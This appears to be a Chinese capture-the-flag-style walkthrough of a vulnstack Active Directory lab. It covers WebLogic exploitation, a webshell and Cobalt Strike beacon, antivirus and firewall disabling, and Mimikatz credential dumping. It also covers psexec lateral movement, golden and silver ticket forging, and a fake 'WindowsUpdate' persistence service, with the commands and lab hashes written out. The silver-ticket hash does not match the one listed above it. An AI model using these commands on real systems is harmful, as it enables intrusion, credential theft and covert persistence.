靶场架构

环境搭建

下载

下载地址:

1
http://vulnstack.qiyuanxuetang.net/vuln/detail/3/

image-20251226204452951

该靶场是解压就能直接用的

虚拟机配置

先新建一个网卡:

image-20251226213449049

同时将NAT网段改为111:

image-20251226214202627

web配置

网卡设置:

image-20251227013442576

注意当登录WEB虚拟机时,需要先恢复快照3,在恢复时会有一个报错,直接点放弃就行了,登陆时切换用户为: WEB\de1ay 密码: 1qaz@WSX 才能进入

image-20251226221656174

提示我密码过期了,我这里换个密码为1qaz@2WSX

修改后登录进去将账户换回域用户mssql,密码1qaz@WSX

接着打开weblogic服务,进入C:\Oracle\Middleware\user_projects\domains\base_domain\bin路径:

image-20251227005007577

管理员身份运行weblogic:
image-20251227024412667

运行后访问http://192.168.111.80:7001/console, 跳转进去登录页面,环境搭建成功:

image-20251227025014308

PC配置

PC端虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网:
image-20251226213714495

image-20251226214653790

需要注意设置WEB 机和 PC 机:计算机右键 -> 管理 -> 配置 -> 服务 ->Server、Workstation、Computer Browser 全部启动(Computer Browser 是关闭的,导致 net view 显示 6118 error 没能解决,在域信息收集时暂时关闭一下防火墙):

net view用于查看本地网络(局域网)中的共享资源,直接运行会列出当前网络中所有可用的计算机(工作组或域中的机器)

image-20251227030338087

image-20251227030241061

开启后还需关闭防火墙:

1
netsh advfirewall set allprofiles state off

这样就能运行了:

image-20251227155050668

DC配置

DC网卡只需要一个内网网卡就行,设置如下:

image-20251226214741323

image-20251226215129243

至此环境搭建完成

搭建总结:

靶场统一登录密码:1qaz@WSX

配置PC和WEB时,会弹框输入administrator/1qaz@WSX

WEB端配置需要恢复到快照V1.3再开启,需要先登陆时切换用户为: WEB\de1ay 密码: 1qaz@WSX 才能进入,然后注销切换成域用户mssql,密码1qaz@WSX

信息收集

先扫描网段:

1
nmap -sP 192.168.111.0/24

-sP只进行主机扫描,不进行端口扫描

image-20251227160938846

对192.168.111.80进行端口扫描:

1
nmap -sS -sV -A -T4 -p- 192.168.111.80

-sS:半开放扫描,发送SYN包,收到SYN/ACK则认为端口开放,然后发送RST终止连接

-sV:识别端口上运行的服务及其具体版本号

-A:综合扫描模式

-T:扫描速度级别,4为较快

-p-:扫描1-65535所有端口

扫描结果:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
┌──(root㉿kali)-[/home/l]
└─# nmap -sS -sV -A -T4 -p- 192.168.111.80
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-27 17:49 CST
Nmap scan report for 192.168.111.80
Host is up (0.0018s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/7.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds
1433/tcp  open  ms-sql-s     Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-info: 
|   192.168.111.80:1433: 
|     Version: 
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-12-27T07:33:44
|_Not valid after:  2055-12-27T07:33:44
| ms-sql-ntlm-info: 
|   192.168.111.80:1433: 
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
|_ssl-date: 2025-12-27T09:51:22+00:00; -1s from scanner time.
3389/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=WEB.de1ay.com
| Not valid before: 2025-12-26T07:34:49
|_Not valid after:  2026-06-27T07:34:49
|_ssl-date: 2025-12-27T09:51:22+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: DE1AY
|   NetBIOS_Domain_Name: DE1AY
|   NetBIOS_Computer_Name: WEB
|   DNS_Domain_Name: de1ay.com
|   DNS_Computer_Name: WEB.de1ay.com
|   DNS_Tree_Name: de1ay.com
|   Product_Version: 6.1.7601
|_  System_Time: 2025-12-27T09:51:08+00:00
7001/tcp  open  http         Oracle WebLogic Server (Servlet 2.5; JSP 2.1)
|_http-title: Error 404--Not Found
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49240/tcp open  msrpc        Microsoft Windows RPC
60966/tcp open  ms-sql-s     Microsoft SQL Server 2008 R2 10.50.4000.00; SP2
| ms-sql-ntlm-info: 
|   192.168.111.80:60966: 
|     Target_Name: DE1AY
|     NetBIOS_Domain_Name: DE1AY
|     NetBIOS_Computer_Name: WEB
|     DNS_Domain_Name: de1ay.com
|     DNS_Computer_Name: WEB.de1ay.com
|     DNS_Tree_Name: de1ay.com
|_    Product_Version: 6.1.7601
| ms-sql-info: 
|   192.168.111.80:60966: 
|     Version: 
|       name: Microsoft SQL Server 2008 R2 SP2
|       number: 10.50.4000.00
|       Product: Microsoft SQL Server 2008 R2
|       Service pack level: SP2
|       Post-SP patches applied: false
|_    TCP port: 60966
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-12-27T07:33:44
|_Not valid after:  2055-12-27T07:33:44
|_ssl-date: 2025-12-27T09:51:22+00:00; -1s from scanner time.
MAC Address: 00:0C:29:68:D3:5F (VMware)
Device type: general purpose
Running: Microsoft Windows Vista|7|8.1
OS CPE: cpe:/o:microsoft:windows_vista cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Vista, Windows 7 SP1, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: WEB
|   NetBIOS computer name: WEB\x00
|   Domain name: de1ay.com
|   Forest name: de1ay.com
|   FQDN: WEB.de1ay.com
|_  System time: 2025-12-27T17:51:08+08:00
|_clock-skew: mean: -53m21s, deviation: 2h39m59s, median: -1s
| smb2-time: 
|   date: 2025-12-27T09:51:08
|_  start_date: 2025-12-27T07:34:14
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WEB, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:68:d3:5f (VMware)

TRACEROUTE
HOP RTT     ADDRESS
1   1.83 ms 192.168.111.80

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.11 seconds

主机名: WEB,域名: de1ay.com,操作系统: Windows Server 2008 R2 Standard SP1

80(IIS7.5)、139(Samba服务)、445(SMB服务)、1433/60966(SQL server)、3389(远程桌面)、7001(Oracle WebLogic 版本10.3.6)端口开放,其中:

  • 445端口开放可能存在smb服务可能还会有ms17-010 永恒之蓝漏洞
  • 139端口开放就存在有samba服务可能会有远程命令执行漏洞
  • 1433端口开放就存在mssql服务有可能存在爆破 注入 sa弱口令
  • 3389远程桌面服务可能存在密码爆破、CVE-2019-0708(BlueKeep)
  • 7001端口 weblogic服务可能有反序列化漏洞

外网打点

看到7001端口我直接利用工具探测是否具有weblogic漏洞,这里我用的是WeblogicTool_1.3:

image-20251227185736640

存在CVE-2016-0638,直接上传哥斯拉内存马:

image-20251227191602507

image-20251227191534414

查看当前权限:

image-20251227202154088

为de1ay\administrator

内网渗透

内网信息收集

查看IP信息:

1
ipconfig /all

image-20251227202558622

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
C:/Oracle/Middleware/user_projects/domains/base_domain/ >ipconfig /all

Windows IP 配置

   主机名  . . . . . . . . . . . . . : WEB
   主 DNS 后缀 . . . . . . . . . . . : de1ay.com
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
   DNS 后缀搜索列表  . . . . . . . . : de1ay.com

以太网适配器 本地连接 2:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2
   物理地址. . . . . . . . . . . . . : 00-0C-29-68-D3-69
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::e8e4:f653:f5de:f864%13(首选) 
   IPv4 地址 . . . . . . . . . . . . : 10.10.10.80(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.10.10.1
   DHCPv6 IAID . . . . . . . . . . . : 301993001
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
   DNS 服务器  . . . . . . . . . . . : 10.10.10.10
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

以太网适配器 本地连接:

   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   物理地址. . . . . . . . . . . . . : 00-0C-29-68-D3-5F
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::cca:90b1:878f:75ce%11(首选) 
   IPv4 地址 . . . . . . . . . . . . : 192.168.111.80(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.111.1
   DHCPv6 IAID . . . . . . . . . . . : 234884137
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-25-06-97-6A-00-0C-29-68-D3-5F
   DNS 服务器  . . . . . . . . . . . : 10.10.10.10
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用

隧道适配器 isatap.{AD80CD23-D97F-4814-A715-9248D845EA0F}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

隧道适配器 isatap.{D7E14072-49B9-45D3-BA8C-7955E6146CC2}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter #2
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是

该web服务器为双网卡:

  • 10.10.10.80
  • 192.168.111.80

并且存在域为de1ay.com

执行systeminfo也可以发现存在域de1ay.com:

image-20251227203227578

查询所有域用户列表:

1
net user /domain

image-20251227205004813

查看不了,说明当前不是域内账户

tasklist查看有无杀软,提示360杀软:

1
tasklist /svc

tasklist:显示当前运行的进程列表,包括进程名、PID(进程ID)、会话名、会话编号和内存使用情况。

/svc:这个参数告诉tasklist显示每个进程所承载的服务。对于每个进程,它会列出该进程所包含的所有服务名称。

image-20251227205422874

image-20251228031137444

存在360杀软,这里可以直接命令关闭的,不影响

先上线CS,创建一个监听器:

image-20251228013723254

再利用CS生成一个木马病毒用于连接:

image-20251228013754374

image-20251228013827281

生成后通过哥斯拉上传至WEB服务器:

image-20251228014019246

上传后执行该程序上线CS:

image-20251228014419375

按理说这一步应该由于360原因要做免杀,但这里依然能上线,估计是生成的webshell已经做过了免杀

但还是先将防火墙和360杀软关闭:

1
2
netsh advfirewall set allprofiles state off #关闭防火墙
taskkill /IM 360Tray.exe /F #关闭指定名称的所有进程,失败

image-20251228015451359

估计是普通管理员权限不够删除360进程,但虽然已经是admin权限,直接getsystem依然会寄掉,可能是360的原因

权限提升

利用工具查询:

image-20251228024833252

CS安装插件TaoWu(梼杌)https://github.com/pandasec888/taowu-cobalt_strike

image-20251228025558699

直接利用MS14-058提权:

image-20251228030731543

尝试杀死360进程:

image-20251228031601333

依旧杀不掉,没招了,360太强大了

继续信息收集

但不影响后面的渗透,获取操作系统凭证:

使用CS上自带的Mimikatz读取本地明文密码和哈希:

抓取到本机域管理员的明文密码:

image-20251228033026682

以及本地管理员账户:

image-20251228033819355

还有域用户myssql的账号密码:

image-20251228033146403

image-20251228033424318

还包括了登录服务器等信息,前面我们nmap扫描时知道该WEB服务器3389端口是开发放的,所以我们获取账户密码后直接远程登录,这里使用myssql域用户登录:
image-20251228144112125

image-20251228145122904

image-20251228144642597

登录成功,查看域内用户:

1
net user /domain    #查询域内用户

image-20251228150131764

查看域管理员用户:

1
net group "domain admins" /domain   #查看域管理员用户

image-20251228150319206

查看域内主机:

1
net group "domain computers" /domain     #查看域内主机

image-20251228150441005

查看域控制器:

1
net group "domain controllers" /domain   #查看域控制器

image-20251228150626011

接着利用ping来获取PC机和域控DC的ip:

1
2
ping DC
ping PC

image-20251228150947975

image-20251228151007257

也可以对10.10.10.0/24网段进行探测出域内DC跟PC:

1
portscan 10.10.10.0/24 1-1024,3389,5000-6000 arp 1024

image-20251228154301565

image-20251228154353644

到目前为止我们就有了域内3台主机的ip了:

1
2
3
10.10.10.80 #外网主机
10.10.10.10 #域控
10.10.10.201 #域用户主机

横向渗透

横向DC

先尝试使用 cs 上面的横向移动模块中 psexec来横向:

条件:目标必须开启 445 端口,并配置允许 SMB 登录;ADMIN$ 共享需可写入。

先创建一个SMB监听器:
image-20251228191650240

利用 psexec横向渗透:

image-20251228155810222

选择已经获得的凭据(明文、散列值、令牌都可以)、回连的listener、进行横向的session:

image-20251228181235889

image-20251228191755748

image-20251228191835009

横向PC

同样的方法进行psexec横向渗透:

image-20251228192002070

到此成功拿下内网三台主机权限

权限维持

黄金票据

条件:

  • 域名称

  • 域的SID值

  • 域的KRBTGT账号的HASH

  • 伪造任意用户名 (获取域的SID和KRBTGT账号的NTLM HASH的前提是需要已经拿到了域的权限)

从DC中hashdump出krbtgt的hash值,krbtgt用户是域中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

获取krbtgt的hash值:

1
mimikatz lsadump::dcsync /user:krbtgt

image-20251228204742831

image-20251228204825495

1
2
Hash NTLM:82dfc71b72a11ef37d663047bc2088fb
aes256_hmac: 42e65a58c000dab8d353b1ff2bee93383f27f0966767afa8c1f32fc51122d118

获取域sid:

1
whoami /user

image-20251228205236833

1
sid:S-1-5-21-2756371121-2868759905-3853650604

总结下来就是:

1
2
3
4
5
域名:de1ay.com
域用户:mssql
krbtgt的hash:82dfc71b72a11ef37d663047bc2088fb
域sid:S-1-5-21-2756371121-2868759905-3853650604
伪造用户名:随意

image-20251228205820391

image-20251228205956808

成功生成

image-20251228210213666

在普通域用户机器上,可以直接列出域控目录:

1
shell dir \\10.10.10.10\c$

image-20251228212225422

白银票据

条件:

  • 域名

  • 域sid

  • 目标服务器名

  • 可利用的服务

  • 服务账号的NTLM HASH

  • 需要伪造的用户名

这里我们要获取的是域控服务器的名称及NTLM hash:

image-20251228214012248

1
2
3
4
5
6
域名:de1ay.com
域sid: S-1-5-21-2756371121-2868759905-3853650604
目标服务器名:dc.de1ay.com
服务:cifs     #文件共享服务
NTLM hash:b7ac9fcec11aeadee88f34ebefa27c38
伪造用户名: 随意

清除票据:

1
mimikatz kerberos::purge

生成白银门票:

1
mimikatz kerberos::golden /domain:de1ay.com /sid:S-1-5-21-2756371121-2868759905-3853650604 /target:dc.de1ay.com /service:cifs /rc4:161cff084477fe596a5db81874498a24 /user:b1uel0n3 /ptt

image-20251228214415611

成功生成

image-20251228214804460

创建service权限维持

对服务器getshell后,为了防止掉线,以及防止目标服务器重启后权限丢失,需要进行权限维持,这里可以选择使用创建service进行权限维持:

  • 首先生成一个artifact.exe用于上线服务器:

    image-20251228214938282

  • 将该exe通过CS文件管理功能上传至目标服务器的一个目录中

  • 执行命令开启一个名为WindowsUpdate的服务,该服务运行时便会执行artifact.exe连接CS

    1
    sc create "WindowsUpdate" binpath= "cmd /c start "C:\Oracle\Middleware\user_projects\domains\base_domain\artifact_x64.exe""&&sc config "WindowsUpdate" start= auto&&net start WindowsUpdate

    image-20251228220122667